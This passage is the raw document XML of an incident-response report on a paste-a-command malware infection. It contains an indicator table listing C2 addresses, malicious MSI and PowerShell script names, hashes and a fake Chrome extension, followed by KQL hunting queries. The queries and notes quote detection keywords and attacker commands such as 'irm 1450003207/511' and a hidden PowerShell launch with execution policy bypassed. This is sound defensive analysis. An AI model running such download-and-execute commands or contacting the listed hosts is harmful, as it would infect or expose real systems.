              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">%TEMP%\&lt;32-character GUID&gt;_235235.msi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Malicious installer (3 identical copies)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3">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">511.ps1 / 705546.ps1</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5">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Scripts in %TEMP% (variable names)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6">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C2 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">31.56.19.29</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8">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C2 over HTTP (blocked by reputation)</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9">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C2 domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">smashshape.com</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B">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C2 over HTTPS behind Cloudflare (not blocked)</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C">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4343/tcp</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E">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WebSocket channel of the extension</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F">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">“Save to Google Drive” · author “Google inc.” · from_webstore: false</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="50.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="50.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence in Chrome</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MSI</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9f87feb984a7dbeb272af5586afed9a34381b06ed172503ab70e612db397d517</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235235.msi downloaded on XXXX-01</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MSI (sandbox)</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97e72fdbb5aad5e54ae438fc8f36a47dab205aadd7e117502235949122e2e300</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The MSI the same URL served four hours later</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705546.ps1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a01e21d9e295f0560ec8e708bc5edc96a2859ed735525cbd8a78925345e8ded9</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MSI script, identical across the three executions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f17a5cdf22b8b7262edd42ce5a588cb290b211c2e6259edf2cd4cca257f05a92</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First download (64,898 bytes)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c6315344ea45507541f1ff8fb8f4c8efa0c67cdbfeb6ced63aed17f30f7dc8b1</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Second and third download (66,564 bytes)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 (sandbox)</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583caef7d65f559fb7c6ab4b00e86f9b33fcc1f1d184ad3416b51579cda03b93</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Variant obtained in the sandbox (59,112 bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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Network indicators belong to the attacker’s infrastructure and are short-lived: the MSI server stopped responding the next day. The server also generates a different 511.ps1 on every download, so its hashes are no basis for detection either. Use them for blocking and retroactive searches. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IOC liveness (passive check, 2026-10-20 · VirusTotal and urlscan.io):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the MSI host 86.109.75.7 (GorillaServers, US) has shown no public-web activity since the incident but still carries a malicious reputation (14/92); the second IP, 31.56.19.29 (AS Blatant, AE), was still live eight days earlier (7/92); the domain smashshape.com answers with a 403 behind Cloudflare (11/92, no Google Safe Browsing classification); and the MSI still scores 10/61, labelled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">trojan.elqnyl/loader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Detection remains partial and lagging: that is the argument for why the hunt rests on behaviour, not on these indicators.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">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y4cyhcs0qayy" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">APPENDIX B: DETAILED QUERIES AND RESULTS - MICROSOFT SENTINEL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Language: KQL (Microsoft Sentinel, Defender for Endpoint tables and the Event table). In Defender Advanced Hunting, replace TimeGenerated with Timestamp. Each query was first tested against a positive control event on a host that sends telemetry.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:after="80" w:before="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Lineage: explorer.exe or the browser launches an interpreter with a download</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">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Detect interpreters (PowerShell, cmd, mshta) launched with a download command by explorer.exe (the trace of a command pasted into Win+R) or by the browser (the trace of FileFix).</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DeviceProcessEvents</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FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")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("explorer.exe", "chrome.exe",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"msedge.exe", "firefox.exe")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ProcessCommandLine has_any ("irm", "iwr", "iex", "Invoke-RestMethod",</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"Invoke-WebRequest", "DownloadString", "http")</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AccountName,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InitiatingProcessFileName, ProcessCommandLine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sort by TimeGenerated asc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">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4 processes on a single host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (XXXX-01): PowerShell launched by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with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">irm 1450003207/511</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the original paste and three retries within a few minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:after="80" w:before="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1b. The same command in RunMRU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">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Corroborate the vector: explorer.exe writes every line run from Win+R to the user’s RunMRU key.</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DeviceRegistryEvents</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ActionType == "RegistryValueSet"</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InitiatingProcessFileName =~ "explorer.exe"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RegistryKey has "RunMRU"</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RegistryValueData has_any ("powershell", "pwsh", "mshta", "curl",</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"irm", "iwr", "http")</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InitiatingProcessAccountName,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RegistryValueName, RegistryValueData</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sort by TimeGenerated asc</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35">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4 writes on XXXX-01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, with the same line as query 1 and within the same seconds: the command was pasted into Win+R, not into a console or the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:after="80" w:before="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Hidden console (Script Block Logging · 4104)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">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Identify PowerShell scripts that hide their own window so the user does not see the execution. Requires Script Block Logging enabled and the PowerShell operational log ingested into Sentinel (Event table). Without that log, DeviceEvents (ActionType PowerShellCommand) shows some of the cmdlets that ran, but not the script content.</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Event</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EventLog == "Microsoft-Windows-PowerShell/Operational" and EventID == 4104</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extend ScriptBlock = coalesce(RenderedDescription, tostring(EventData))</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ScriptBlock has "GetConsoleWindow"</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ScriptBlock has_any ("ShowWindow", "FreeConsole")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project TimeGenerated, Computer, ScriptBlock</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3C">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The script defines at runtime, with random names, calls to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GetConsoleWindow</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ShowWindow(h, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FreeConsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and also sets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$env:SEE_MASK_NOZONECHECKS=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The console disappeared, which very likely explains the retries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:after="80" w:before="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Hidden PowerShell child of msiexec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013E">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Detect MSI installers that launch PowerShell with a hidden window.</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DeviceProcessEvents</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InitiatingProcessFileName =~ "msiexec.exe"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FileName in~ ("powershell.exe", "pwsh.exe")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ProcessCommandLine contains "hidden"</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InitiatingProcessCommandLine,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ProcessCommandLine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">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msiexec.exe -Embedding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> launches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File …\Temp\705546.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
